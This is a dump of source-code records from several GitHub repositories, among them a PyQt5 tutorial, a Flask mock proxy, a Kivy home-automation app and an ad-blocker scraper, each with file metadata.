closeBtn(self):\r\n reply = QMessageBox.question(self,\r\n \"Cancel\",\r\n \"Are you sure to cancel?\",\r\n QMessageBox.Yes | QMessageBox.No,\r\n QMessageBox.No)\r\n if reply == QMessageBox.Yes:\r\n QCoreApplication.instance().quit()\r\n else:\r\n pass\r\n\r\n\r\nif __name__ == '__main__':\r\n app = QApplication(sys.argv)\r\n ex = Example()\r\n sys.exit(app.exec())\r\n" }, { "alpha_fraction": 0.6272482872009277, "alphanum_fraction": 0.6340706944465637, "avg_line_length": 34.64393997192383, "blob_id": "732e7eea812dd15c712a6082036f7124f0330bdf", "content_id": "3dc5dae3d54c1bb5f2c58803b83670f8b4f6253a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 7519, "license_type": "no_license", "max_line_length": 86, "num_lines": 132, "path": "/PyQt5/Aloha.py", "repo_name": "legendaryCJT/Learining", "src_encoding": "UTF-8", "text": "import sys\r\nfrom PyQt5.QtWidgets import QApplication\r\n# QCoreApplication包含了事件的主循环,它能添加和删除所有的事件\r\nfrom PyQt5.QtWidgets import QWidget, QToolTip\r\n# QWidget控件是一个用户界面的基本控件,提供了基本的应用构造器。\r\nfrom PyQt5.QtWidgets import QPushButton, QMessageBox\r\n#\r\nfrom PyQt5.QtWidgets import QDesktopWidget\r\n# QtGui.QDesktopWidget提供了用户的桌面信息,包括屏幕的大小\r\n# 以上引入了PyQt5.QtWidgets模块的不少组件,这个模块包含了基本的组件。\r\n\r\nfrom PyQt5.QtGui import QIcon, QFont\r\n# 有关图标和字体的设置\r\nfrom PyQt5.QtCore import QCoreApplication\r\n\r\n# 如何用程序关闭一个窗口。这里我们将接触到一点single和slots的知识。\r\n\r\n\r\nclass Example(QWidget):\r\n # QWidget是UI的基本控件,提供基本的应用构造器。\r\n # 默认情况下构造器没有父级,没有父级的构造器被称为“窗口”(window)。\r\n # 这里意味着我们调用两个构造器,一是类本身,二是这个类继承的。\r\n\r\n def __init__(self):\r\n # super()构造器方法返回父级的对象。__init__()方法是构造器的一个方法。\r\n super().__init__()\r\n self.initUI()\r\n\r\n def initUI(self):\r\n # 创建了有图标的窗口,并且有提示框和按钮,再实现按钮的功能(Quit)。\r\n\r\n QToolTip.setFont(QFont('SansSerif', 10)) # 设置提示框字体。\r\n\r\n self.setToolTip(\"This is a <b>Qwidget</b> widget\")\r\n # 调用这个方法创建提示框可以使用富文本格式的内容。\r\n\r\n btn = QPushButton('Button', self)\r\n # QPushButton(string text, QWidget parent = None)\r\n # text参数是想要显示的按钮名称,parent参数是放在按钮上的组件,在本例中,这个参数是QWidget。\r\n # 应用中的组件都是一层一层(继承而来的?)的。\r\n # 在这个层里,大部分的组件都有自己的父级,没有父级的组件,是顶级的窗口。\r\n\r\n btn.setToolTip(\"This is a <b>QPushButton</b> widget\")\r\n # 添加了一个按钮,并为其添加了一个提示框。\r\n btn.resize(btn.sizeHint())\r\n # 调整按钮大小,sizeHint()方法提供默认大小\r\n btn.move(50, 50)\r\n btn.clicked.connect(self.btnTips)\r\n # 自己写的btnTips弹窗信息框, 连接信号和时间时的方法应该传递地址(即不带\"()\")\r\n\r\n QuitBtn = QPushButton('Quit', self)\r\n # QuitBtn.clicked.connect(QCoreApplication.instance().quit)\r\n # 点击事件和能终止进程并退出应用的quit函数绑定在了一起。\r\n # 在发送者和接受者之间建立了通讯,发送者就是按钮,接受者就是应用对象。\r\n QuitBtn.clicked.connect(self.closeBtn)\r\n QuitBtn.resize(QuitBtn.sizeHint())\r\n QuitBtn.move(50, 100)\r\n # 事件传递系统在PyQt5内建的single和slot机制里面。点击按钮后,信号会被捕捉并给出既定的反应。\r\n # QCoreApplication包含了事件的主循环,它能添加和删除所有的事件。\r\n # instance()创建了一个它的实例。QCoreApplication是在QApplication里创建的。\r\n\r\n self.setGeometry(300, 300, 500, 300) # 前两是位置,后两是大小\r\n # move(移动放置的位置)和resize(改变控件大小)方法的组合\r\n self.setWindowTitle(\"Example\") # SetWindowTitle\r\n self.setWindowIcon(QIcon('./timg.jpg')) # SetWindowIcon\r\n self.center() # 自己写的使窗口居中的类函数\r\n self.show() # 为了让控件显示的方法,在内存创建而后显示器上有所显示。\r\n\r\n def closeEvent(self, event):\r\n # 如果关闭QWidget,就会产生一个QCloseEvent,\r\n # 并且把它传入到closeEvent函数的event参数中。\r\n # 改变控件的默认行为,就是替换掉默认的事件处理。\r\n reply = QMessageBox.question(self, 'Message', 'Are you sure to quit?',\r\n QMessageBox.Yes | QMessageBox.No,\r\n QMessageBox.No)\r\n # 创建了一个消息框,上面有俩按钮:Yes和No.\r\n # 第一个参数是父级窗口,此处self为主窗口QWidget生成的Example\r\n # 第二个字符串显示在消息框的标题栏,\r\n # 第三个参数(字符串)显示在对话框,第四个参数是消息框的俩按钮,\r\n # 最后一个参数是默认按钮,这个按钮是默认选中的。返回值在变量reply里。\r\n if reply == QMessageBox.Yes:\r\n event.accept()\r\n # QCoreApplication.instance().quit()\r\n else: # == QMessageBox.No\r\n event.ignore()\r\n # 判断reply值,如果点击的是Yes按钮,就关闭组件和应用,否则忽略关闭事件。\r\n\r\n # 该事件处理系统建立在 PyQt5 的信号/槽的机制上。如果我们点击该按钮,按钮将会发出信号,\r\n # 单击信号连接到 quit() 方法使应用程序终止。槽可以是 Qt 的槽也可以是 Python 的任何调用。\r\n # QCoreApplication 包含主事件循环;它处理和调度所有事件。instance()方法为我们提供了其当前实例。\r\n # 注意,区分 QCoreApplication 与 QApplication。\r\n # 发送器和接收器:在通信的两个对象之间进行。发送器是按钮,接收器是应用对象\r\n # !!整理概念\r\n # 按钮(btn)是发送器。点击(clicked)按钮后,发出点击信号。点击信号连接(connect)到槽(可以是 Qt 的槽也可以是 Python 的任何调用)。\r\n # 在我们的例子中是Qt的槽,QCoreApplication处理和调度所有Qt事件,调度出instance(这个实例(接收器))的 quit 事件。\r\n\r\n def closeBtn(self):\r\n reply = QMessageBox.question(self, \"Quit\", \"Are you sure to quit?\",\r\n QMessageBox.Yes | QMessageBox.No,\r\n QMessageBox.No)\r\n if reply == QMessageBox.Yes:\r\n QCoreApplication.instance().quit()\r\n else:\r\n pass\r\n\r\n def btnTips(self):\r\n QMessageBox.information(self, \"Btn\", \"Clicked Btn\")\r\n\r\n def center(self):\r\n qr = self.frameGeometry()\r\n # 获得主窗口所在的框架。\r\n cp = QDesktopWidget().availableGeometry().center()\r\n # QtGui.QDesktopWidget提供了用户的桌面信息,包括屏幕的大小。\r\n # 获取显示器的分辨率,然后得到屏幕中间点的位置\r\n qr.moveCenter(cp)\r\n # 把主窗口框架的中心点放置到屏幕的中心位置。\r\n self.move(qr.topLeft())\r\n # 把主窗口左上角移动到其框架的左上角,这样就把窗口居中了。\r\n\r\n\r\nif __name__ == '__main__':\r\n app = QApplication(sys.argv)\r\n # 每个PyQt5应用都必须创建一个应用对象。sys.argv是一组命令行参数的列表。\r\n # Python可以在shell里运行,这个参数提供对脚本控制的功能。\r\n ex = Example()\r\n # 实例化\r\n sys.exit(app.exec())\r\n # 进入应用主循环,事件处理器开始工作。\r\n # 从窗口接收事件并把事件派送到应用控件。\r\n # 当调用sys.exit方法或直接销毁主控件时,主循环结束。\r\n # exit方法确保主循环安全退出。外部环境能通知主控件如何结束\r\n # 有exec()与exec_() 是因为exec在py中是关键字,方便区分。\r\n" } ]
6
subeeshb/mockproxy
https://github.com/subeeshb/mockproxy
6f10e3277c79d39c435a24b48bd70281907821d5
a822c2984618a331bf0adacbdc0e6576fbb10305
4d23877d044996939ec0e18400b0b89fd6f00ed0
refs/heads/master
2020-04-12T17:57:36.312711
2013-11-29T02:06:17
2013-11-29T02:06:17
14,771,599
1
0
null
null
null
null
null
[ { "alpha_fraction": 0.7175469994544983, "alphanum_fraction": 0.7264995574951172, "avg_line_length": 28.786666870117188, "blob_id": "3f1b178b1c708d322c251a7fee550ccad9fc9372", "content_id": "e20d57a1a376bfa8a9d0027faee11bd31f4d1d93", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 2234, "license_type": "no_license", "max_line_length": 341, "num_lines": 75, "path": "/README.md", "repo_name": "subeeshb/mockproxy", "src_encoding": "UTF-8", "text": "mockproxy\n=========\n\nThis is a Flask-based web application that acts as a proxy server to an API, letting you capture and repeat HTTP responses. Recorded responses can be useful when testing applications that rely on web service data.\n\nPre-requisites\n--------------\n\nTo use this script, you must first install the Flask web application framework. You can do this using pip using the command below, or refer to detailed instructions here: http://flask.pocoo.org/\n\n```\n$ pip install Flask\n```\n\n\nUsage\n-----\n\nUpdate the values in config.py. Specify the port the application should listen on, the base url (if any), and the details of the upstream API that you want to proxy to.\n\n```python\n#which port should the server run on?\nPORT = 5000\n\n#what's the base url path? e.g. do all web service requests start with 'api/'?\nBASE_URL_PATH = 'api/'\n\n#what's the actual web service endpoint? requests will be proxied here if there's\n#no recorded data available.\nUPSTREAM_ENDPOINT = {\n\t'host' : '127.0.0.1',\n\t'port' : '8080'\n}\n```\n\nThen, just start the application by running server.py. You can specify an output folder for saving web responses as a parameter, otherwise the default output folder will be 'templates'.\n\n```\n$ python server.py [output folder]\n```\n\n\nRecording and playback\n----------------------\n\nEach web service response is saved in its own file, with the folder structure in the output folder matching the url path. When a request is received, the application proxies the request to the upstream API if no response was previously recorded. If a recorded response is present, the contents of the response are processed and played back. \n\nThe application current supports request data in JSON format. You can edit recorded responses to insert dynamic values by enclosing python code within {{ ... }} blocks. Request data is converted into a dictionary and can be referenced using the 'request' variable.\n\nFor example, with the following request data,\n\n```\n{\n\t\"userid\":\"user001\",\n\t\"password\":\"mypassword\"\n}\n```\n\n, a request to a URL with the following recorded response\n\n```\n{\n\t\"loginstatus\":\"success\",\n\t\"userid\":\"{{ request['userid'] }}\"\n}\n```\n\nwill return the following \n\n```\n{\n\t\"loginstatus\":\"success\",\n\t\"userid\":\"user001\"\n}\n```\n" }, { "alpha_fraction": 0.6327784657478333, "alphanum_fraction": 0.6345620155334473, "avg_line_length": 33.8068962097168, "blob_id": "4315802b13b5e0f0a81a241803a458091d54af91", "content_id": "a855756a84467d3d32babd79c68a0d0c804a94cd", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 5046, "license_type": "no_license", "max_line_length": 112, "num_lines": 145, "path": "/server.py", "repo_name": "subeeshb/mockproxy", "src_encoding": "UTF-8", "text": "from flask import Flask, Response, request\nfrom werkzeug.datastructures import Headers\nimport json\nimport sys\nimport os\nimport httplib\nimport StringIO\nimport gzip\nimport config\n\napp = Flask(__name__)\n\nDEFAULT_TEMPLATE_FOLDER = './templates/'\nHEADERS_FILE_SUFFIX = '.headers'\nREQUIRED_HEADERS = [\"set-cookie\"]\n\ndef get_response_template(path):\n filename = os.path.join(template_folder, path)\n resp_template = '{}';\n with file(filename) as f:\n resp_template = f.read()\n return resp_template\n\ndef get_response_headers(path):\n filename = os.path.join(template_folder, path + HEADERS_FILE_SUFFIX)\n headers = []\n if os.path.isfile(filename):\n with file(filename, 'r') as f:\n for line in f:\n headers.append(tuple(line.replace('\\n','').split('::')))\n return headers\n\ndef extract_tokens(template):\n tokens = {}\n while template.find('{{') > -1:\n tokenStart = template.find('{{')\n tokenEnd = template.find('}}')\n if tokenEnd == -1:\n raise Exception('Error parsing tokens: token not closed?')\n tokenName = template[tokenStart+2:tokenEnd]\n tokens[tokenName] = ''\n template = template.replace('{{' + tokenName + '}}', '')\n return tokens\n\ndef evaluate_tokens(tokens, request):\n for token in tokens.keys():\n value = eval(token.strip())\n tokens[token] = value\n return tokens\n\ndef apply_token_values(tokens, response_template):\n for token in tokens.keys():\n response_template = response_template.replace('{{'+token+'}}', tokens[token])\n return response_template\n\ndef process_response_template(request, response_template):\n tokens = extract_tokens(response_template)\n tokens = evaluate_tokens(tokens, request)\n template = apply_token_values(tokens, response_template)\n return template\n\ndef is_gzipped(response):\n return response[:2].encode('hex') == '1f8b'\n\ndef get_live_response(request, path):\n host = config.UPSTREAM_ENDPOINT['host']\n port = config.UPSTREAM_ENDPOINT['port']\n print 'Getting live response from %s:%s/%s' % (host, port, path)\n conn = httplib.HTTPConnection(host, port)\n request_headers = {}\n for key, value in request.headers:\n if key in [\"accept-encoding\"]:\n continue\n request_headers[key] = value\n conn.request(request.method, '/' + path, body=request.data, headers=request_headers)\n resp = conn.getresponse()\n print 'Response received.'\n contents = resp.read()\n print resp.getheader('content-type')\n if is_gzipped(contents):\n print 'Decoding gzip...'\n gzip_data = gzip.GzipFile(fileobj = StringIO.StringIO(contents))\n contents = gzip_data.read()\n return (contents, resp.getheaders())\n\ndef ensure_dir(f):\n d = os.path.dirname(f)\n if not os.path.exists(d):\n os.makedirs(d)\n\ndef save_live_response(path, response_data, headers):\n response_filename = os.path.join(template_folder, path)\n ensure_dir(response_filename)\n with open(response_filename, 'w') as output_file:\n output_file.write(response_data)\n\n headers_filename = os.path.join(template_folder, path + HEADERS_FILE_SUFFIX)\n with open(headers_filename, 'w') as output_file:\n for key, value in headers:\n header_string = '%s::%s\\n' % (key, value)\n output_file.write(header_string)\n\n\[email protected]('/', defaults={'path': ''}, methods=['GET', 'POST'])\[email protected]('/<path:path>', methods=['GET', 'POST'])\ndef handle_path(path):\n try:\n if not config.BASE_URL_PATH == '':\n path = path.replace(config.BASE_URL_PATH, '')\n\n response_template = get_response_template(path)\n if len(request.data) > 0:\n request_data = json.loads(request.data)\n response = process_response_template(request_data, response_template)\n else:\n response = response_template\n print 'Serving recorded response.'\n resp = Response(response, mimetype='application/json')\n headers = get_response_headers(path)\n for key, value in headers:\n if key in REQUIRED_HEADERS:\n resp.headers.add(key, value)\n return resp\n except IOError:\n try:\n live_response, headers = get_live_response(request, config.BASE_URL_PATH + path)\n save_live_response(path, live_response, headers)\n resp = Response(live_response, mimetype='application/json')\n for key, value in headers:\n if key in REQUIRED_HEADERS:\n resp.headers.add(key, value)\n print 'Serving live response.'\n return resp\n except Exception, ex:\n return repr(ex)\n except Exception, e:\n return repr(e)\n\n\ntemplate_folder = sys.argv[1] if len(sys.argv) > 1 else DEFAULT_TEMPLATE_FOLDER\nprint ' * Serving data from %s' % template_folder\nprint ' * Proxying new requests to %s:%s' % (config.UPSTREAM_ENDPOINT['host'], config.UPSTREAM_ENDPOINT['port'])\n\nif __name__ == \"__main__\":\n app.run(port=config.PORT)" }, { "alpha_fraction": 0.6554877758026123, "alphanum_fraction": 0.6981707215309143, "avg_line_length": 26.41666603088379, "blob_id": "0fc34ebdc51b4c0163fb85387767f0106daef392", "content_id": "1facd1e72d9d7547ed6696412ee4dc307de403a9", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 328, "license_type": "no_license", "max_line_length": 81, "num_lines": 12, "path": "/config.py", "repo_name": "subeeshb/mockproxy", "src_encoding": "UTF-8", "text": "#which port should the server run on?\nPORT = 5000\n\n#what's the base url path? e.g. do all web service requests start with 'api/'?\nBASE_URL_PATH = 'api/'\n\n#what's the actual web service endpoint? requests will be proxied here if there's\n#no recorded data available.\nUPSTREAM_ENDPOINT = {\n\t'host' : '127.0.0.1',\n\t'port' : '8080'\n}" } ]
3
mayankpoddar/TestHomeAutomation
https://github.com/mayankpoddar/TestHomeAutomation
66d78c09e93ea7d227933f023e879544c4dbddcc
9cd3504d0e78e6342f4406a2399992bcdec6a674
19d1bf08f0d33545fb3cd15c6f64a9d30fd785b6
refs/heads/master
2020-05-21T02:16:36.840329
2019-05-09T22:07:29
2019-05-09T22:07:29
185,873,365
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.6154360771179199, "alphanum_fraction": 0.6404193639755249, "avg_line_length": 34.86399841308594, "blob_id": "61925c6e7838e9acda9f748197761f7971f3c270", "content_id": "6bfdffe97fcc4ff5d48c9bbb237cfa300ca738b2", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4483, "license_type": "no_license", "max_line_length": 267, "num_lines": 125, "path": "/main.py", "repo_name": "mayankpoddar/TestHomeAutomation", "src_encoding": "UTF-8", "text": "from kivy.app import App\nfrom kivy.uix.label import Label\nfrom kivy.uix.gridlayout import GridLayout\nfrom kivy.uix.button import Button\nfrom kivy.core.window import Window\nfrom kivy.uix.screenmanager import ScreenManager, Screen\nfrom kivy.network.urlrequest import UrlRequest\nfrom kivy.uix.popup import Popup\n\nclass IntroPage(GridLayout):\n def __init__(self, **kwargs):\n super().__init__(**kwargs)\n self.cols = 1\n\n self.label = Label(text=\"Hey there! \\n This Phone belongs to Mayank of House Poddar, \\n First of His Name, \\n King of the Andals and the First Men, \\n Lord of the Seven Kingdoms, \\n and Protector of the Realm.\", halign=\"center\", valign=\"middle\", font_size=30)\n self.label.size_hint_y = None\n self.label.height = Window.size[1]*0.9\n self.add_widget(self.label)\n\n self.button = Button(text=\"Proceed\")\n self.button.bind(on_press=self.clicked)\n self.add_widget(self.button)\n\n def clicked(self, instance):\n myapp.screenmanager.current = \"Tabs\" \n\nclass TabsPage(GridLayout):\n def __init__(self, **kwargs):\n super().__init__(**kwargs)\n self.cols = 1\n\n self.add_widget(Label(text=\"\", size_hint_y=None, height=Window.size[1]*0.1))\n\n self.lightButtonON = Button(text=\"Switch Light ON\")\n self.lightButtonON.size_hint_y = None\n self.lightButtonON.height = Window.size[1]*0.1\n self.lightButtonON.bind(on_press=self.toggleLight)\n\n self.add_widget(self.lightButtonON)\n\n self.add_widget(Label(text=\"\", size_hint_y=None, height=Window.size[1]*0.05))\n\n self.lightButtonOFF = Button(text=\"Switch Light OFF\")\n self.lightButtonOFF.size_hint_y = None\n self.lightButtonOFF.height = Window.size[1]*0.1\n self.lightButtonOFF.bind(on_press=self.toggleLight)\n\n self.add_widget(self.lightButtonOFF)\n\n self.add_widget(Label(text=\"\", size_hint_y=None, height=Window.size[1]*0.05))\n\n self.fanButtonON = Button(text=\"Switch Fan ON\")\n self.fanButtonON.size_hint_y = None\n self.fanButtonON.height = Window.size[1]*0.1\n self.fanButtonON.bind(on_press=self.toggleFan)\n\n self.add_widget(self.fanButtonON)\n\n self.add_widget(Label(text=\"\", size_hint_y=None, height=Window.size[1]*0.05))\n\n self.fanButtonOFF = Button(text=\"Switch Fan OFF\")\n self.fanButtonOFF.size_hint_y = None\n self.fanButtonOFF.height = Window.size[1]*0.1\n self.fanButtonOFF.bind(on_press=self.toggleFan)\n\n self.add_widget(self.fanButtonOFF)\n\n self.add_widget(Label(text=\"\", size_hint_y=None, height=Window.size[1]*0.05))\n\n self.unlockButton = Button(text=\"Unlock Door\")\n self.unlockButton.size_hint_y = None\n self.unlockButton.height = Window.size[1]*0.1\n self.unlockButton.bind(on_press=self.toggleLock)\n\n self.add_widget(self.unlockButton)\n\n self.add_widget(Label(text=\"\", size_hint_y=None, height=Window.size[1]*0.05))\n\n self.lockButton = Button(text=\"Lock Door\")\n self.lockButton.size_hint_y = None\n self.lockButton.height = Window.size[1]*0.1\n self.lockButton.bind(on_press=self.toggleLock)\n\n self.add_widget(self.lockButton)\n\n self.add_widget(Label(text=\"\", size_hint_y=None, height=Window.size[1]*0.05))\n\n def toggleLight(self, instance):\n if instance.text == \"Switch Light ON\":\n req = UrlRequest(\"http://192.168.0.123/LED=ON\")\n else:\n req = UrlRequest(\"http://192.168.0.123/LED=OFF\")\n\n def toggleFan(self, instance):\n if instance.text == \"Switch Fan ON\":\n req = UrlRequest(\"http://192.168.0.124/FAN=ON\")\n else:\n req = UrlRequest(\"http://192.168.0.124/FAN=OFF\")\n\n def toggleLock(self, instance):\n if instance.text == \"Unlock Door\":\n req = UrlRequest(\"http://192.168.0.123/DOORLOCK=OFF\")\n else:\n req = UrlRequest(\"http://192.168.0.123/DOORLOCK=ON\")\n\nclass MyApp(App):\n\n def build(self):\n self.screenmanager = ScreenManager()\n\n self.intropage = IntroPage()\n screen = Screen(name=\"Intro\")\n screen.add_widget(self.intropage)\n self.screenmanager.add_widget(screen)\n\n self.tabspage = TabsPage()\n screen = Screen(name=\"Tabs\")\n screen.add_widget(self.tabspage)\n self.screenmanager.add_widget(screen)\n\n return self.screenmanager\n\nif __name__ == \"__main__\":\n myapp = MyApp()\n myapp.run()\n" }, { "alpha_fraction": 0.6793892979621887, "alphanum_fraction": 0.7412213683128357, "avg_line_length": 45.78571319580078, "blob_id": "55af060866faf61396544ff891ec34d5853596c9", "content_id": "6149bb092b5e433ad0397c093421b07813575471", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 1310, "license_type": "no_license", "max_line_length": 139, "num_lines": 28, "path": "/README.md", "repo_name": "mayankpoddar/TestHomeAutomation", "src_encoding": "UTF-8", "text": "# TestHomeAutomation\nHomeAutomation using a Wemos D1 Mini, Servo Motor (180 degree), LED. iOS App using Kivy - Python.\n\nHardware Requirements:\n1. Wemos D1 Mini ESP8266 - https://www.amazon.in/gp/product/B077MDHLRC/\n2. Servo Motor (180 Degrees) - https://www.amazon.in/gp/product/B00MTFFAE0/\n\nWemos D1 Mini Pinout:\n![](https://escapequotes.net/wp-content/uploads/2016/02/esp8266-wemos-d1-mini-pinout.png)\n\nTools Needed:\n1. Arduino IDE \n2. Python >= 3.6\n3. XCode\n\nSetup Instructions:\n\n* IDE Setup\n 1. Download and Install the Arduino IDE from https://www.arduino.cc/en/main/software\n 2. Open Arduino > Preferences > Additional Board Manager URLs: http://arduino.esp8266.com/stable/package_esp8266com_index.json. Click OK.\n 3. Open Tools > Board > Boards Manager. Type esp in the search bar, and Install \"esp8266 by ESP8266 Community\". Click OK.\n 4. Open Tools > Board. Select Wemos D1 R1.\n 5. Paste the WemosD1.ino code inside the file. Change the ssid, password and gateway according to your router and save it.\n 6. Connect the ESP8266 module via USB. Select your USB Port from Tools > Port.\n 7. Connect a LED to GPIO Pin D5 and G. \n 7. Upload the Sketch using Sketch > Upload.\n 8. Open Browser and go to the static ip for the module: http://192.168.0.123/\n 9. Use the Links to switch On/Off the LED.\n" } ]
2
mmscibor/AdBlocker
https://github.com/mmscibor/AdBlocker
9695c57b576b7deb9c9122f8650013846ff8ec82
c0acbe807abda45ee08896e8f55de3cbaae68630
801640298e503453d0682625870868c3e8685718
refs/heads/master
2021-01-10T20:13:08.246966
2014-03-28T20:21:58
2014-03-28T20:21:58
17,447,583
1
0
null
null
null
null
null
[ { "alpha_fraction": 0.7952662706375122, "alphanum_fraction": 0.7952662706375122, "avg_line_length": 64, "blob_id": "3b8b635dde7a027ba302c31c42e2aaeb3cbbd0b8", "content_id": "f1b38daf0efd472aa765d2451e468f0ee4b4d492", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 1690, "license_type": "no_license", "max_line_length": 280, "num_lines": 26, "path": "/README.md", "repo_name": "mmscibor/AdBlocker", "src_encoding": "UTF-8", "text": "Ad Blocker\n==========\n\nThe ad blocker project attempts an alternative approach to blocking advertisements than black / white listing. Instead of \nthat, it takes as an input training data in the form of binary features of the metadata of various elements on a given\nwebpage. In the training data, it is known whether an element is or is not an ad.\n\nThe feature space in the training data, however, it extremely large and much of it is redundant and not helpful.\n\nThe initial portion of this project attempts to cut down the feature space using various methods: a PRT function in MATLAB\neliminates features based on an elimination criterion, however, very good results were also obtained by finding the correlation between the correct classification and that particular binary feature, then selecting those features with the greatest correlations.\n\nThis step was necessary because the training time on the algorithm utilized was initially very high, however the improvements made on the percentage of correctly sorted advertisements was not substantial enough to merit use of all the features.\n\nThe algorithm utilized was the TreeBagger algorithm, provided by the PRT toolikit in MATLAB. \n\nThe benefits of utilizing such an algorithm instead of a black / white list is that it needs to be maintained less, can be improved by expanding the training data (allow a user to mark an ad if it gets through, and that will automatically update the training data for all users). \n\nThe training phase, depending on the processing power of the machine, would last at most a few minutes, however after training is complete, classification is near instant.\n\nAuthors\n-------\n\n - Christian Sherland\n - Michael Scibor\n - Sameer Chauhan\n" }, { "alpha_fraction": 0.817460298538208, "alphanum_fraction": 0.817460298538208, "avg_line_length": 17, "blob_id": "142ff79d0d68c0f841d7fcdde254830bfb071b5d", "content_id": "d329e76c80e8591bcca1a83b0eda05479fbb790d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Makefile", "length_bytes": 126, "license_type": "no_license", "max_line_length": 20, "num_lines": 7, "path": "/FinalProject/Writeup/makefile", "repo_name": "mmscibor/AdBlocker", "src_encoding": "UTF-8", "text": "mac : adclassify.tex\n\tpdflatex adclassify\n\tbibtex adclassify\n\tpdflatex adclassify\n\tpdflatex adclassify\n\t\n\topen adclassify.pdf\n" }, { "alpha_fraction": 0.5381062626838684, "alphanum_fraction": 0.542725145816803, "avg_line_length": 26.62765884399414, "blob_id": "99dd1a680c91038c1b97a92f7b3c2e8191a3ee51", "content_id": "afc8e7f9bdcdfef4500a3c86caa72d61a312b64c", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2598, "license_type": "no_license", "max_line_length": 104, "num_lines": 94, "path": "/FinalProject/extractFeatures.py", "repo_name": "mmscibor/AdBlocker", "src_encoding": "UTF-8", "text": "# Christian Sherland\n# Sameer Chauhan\n# Michael Scibor\n#\n# getData.py\n# Accepts a web url and gets features on all\n# image anchor tags on the page to classify\n# as ad or not ad\n\nfrom bs4 import BeautifulSoup\nimport urllib2\nimport csv\nimport sys\nimport re\n\nif __name__ == '__main__':\n # Parse webpage specified in arg 1\n url = sys.argv[1]\n\n try:\n content = urllib2.urlopen(url).read()\n except:\n print 'Could not open url'\n exit(-1)\n soup = BeautifulSoup(content)\n\n # for div in divs:\n # if div.find('a'):\n # print(div.find('a').get('href'))\n # if div.find('img'):\n # print(div.find('img').get('height'))\n # print(div.find('img').get('width'))\n # print(div.find('img').get('height'))\n\n\n # .find returns first instance of tag\n # .find_all returns all of them\n # general layout of AD:\n\n # <a href=\"Link\">\n # <img src=\"source\" width=\"W\" height=\"H\" alt=\"ALT\"/>\n # </a>\n # Want to find image tags WITHIN an anchor\n\n # create list of anchors which contain an image\n anchors = [a for a in soup.find_all('a') if a.find('img') ]\n\n adData = []\n\n for a in anchors:\n href, imgH, imgW, alt = 0,0,0,0 # Reset values each time\n if a.find('img'):\n print(\"Found an image\")\n href = a.get('href')\n txt = a.text\n src = a.find('img').get('src') if a.find('img').get('src') else a.find('img').get('imgsrc')\n imgH = a.find('img').get('height')\n imgW = a.find('img').get('width')\n alt = a.find('img').get('alt')\n\n print(href)\n print(txt if txt !=\"\" else \"NOTEXT\")\n print(src)\n print(imgH)\n print(imgW)\n print(alt if alt != \"\" else \"NOALT\")\n\n\n # If value is missing continue (almost always mising)\n if not (href and imgW and imgH and alt):\n print(\"Missing Component\\n\\n\")\n continue\n\n # Calculate aspect ratio to 3 decimal places\n aspect = format(imgH/float(imgW), '.3f')\n\n # Local?\n print href\n\n # Translate data to boolean features\n alt = alt.lower()\n ad = int('ad' in alt)\n\n # Create list of features for page\n linkData = [imgW,imgH, aspect, ad]\n\n # Add element to dataset\n adData.append(linkData)\n \n \n # Write data to csv for classification by MATLAB\n with open('urlData.csv', 'wb') as csvfile:\n writer = csv.writer(csvfile, delimiter=',', quotechar=' ', quoting=csv.QUOTE_MINIMAL)\n writer.writerows(adData)\n\n" } ]
3
airmonitor/fastlogging
https://github.com/airmonitor/fastlogging
1a599f2a309f291fc411592332f400c0ba9850bf
8e07e6e6edb765767009c0823fbd3599101a99af
f40986e2c16a10534c91764d772cc7075f9e2176
refs/heads/master
2021-05-19T03:20:54.746028
2019-12-07T06:13:04
2019-12-07T06:13:04
null
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.6734693646430969, "alphanum_fraction": 0.6734693646430969, "avg_line_length": 35.5, "blob_id": "5134a41d7977c0addffd0d868f91444c92a32e85", "content_id": "59487c454cf54c65b5b275336ae042a593956760", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 147, "license_type": "permissive", "max_line_length": 47, "num_lines": 4, "path": "/examples/opt_test.py", "repo_name": "airmonitor/fastlogging", "src_encoding": "UTF-8", "text": "\ndef bar():\n logger.debug(\"This is a debug message\")\n logger.info(\"This is an info message\")\n logger.warning(\"This is a warning message\")\n" } ]
1
lcaparros/be-python-cucumber-template
https://github.com/lcaparros/be-python-cucumber-template
b09261a70d9c8d5279b8cdf252c8a9d914a5b87b
e89648ede73a004b269c8687936df9ec6d68ae4c
4e058749c5b21daf1523ffa8652937b1f2e1b9aa
refs/heads/main
2023-04-20T09:20:52.341668
2021-04-20T08:04:06
2021-04-20T08:04:06
359,493,957
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.6829268336296082, "alphanum_fraction": 0.6829268336296082, "avg_line_length": 19, "blob_id": "d888cf89054dc1c9c9e432547667998104ed1c76", "content_id": "1e774c3b7405e9b1020dbf63d863fa10aaaa6ba8", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 123, "license_type": "no_license", "max_line_length": 39, "num_lines": 6, "path": "/features/environment.py", "repo_name": "lcaparros/be-python-cucumber-template", "src_encoding": "UTF-8", "text": "\n\ndef before_all(context):\n print(\"Before all\")\n\n\ndef before_scenario(context, scenario):\n print(\"Before scenario\")\n\n" }, { "alpha_fraction": 0.6239870190620422, "alphanum_fraction": 0.6320907473564148, "avg_line_length": 29.09756088256836, "blob_id": "e975cac19617195fe5ff7ebf6fcc441f67d34c62", "content_id": "52b4757e2dc85d6100c6913bac703d6ea0169ad6", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1234, "license_type": "no_license", "max_line_length": 75, "num_lines": 41, "path": "/features/steps/test.py", "repo_name": "lcaparros/be-python-cucumber-template", "src_encoding": "UTF-8", "text": "from log import get_custom_logger\nimport requests\nimport json\nfrom utils import *\nfrom behave import *\n\nlog = 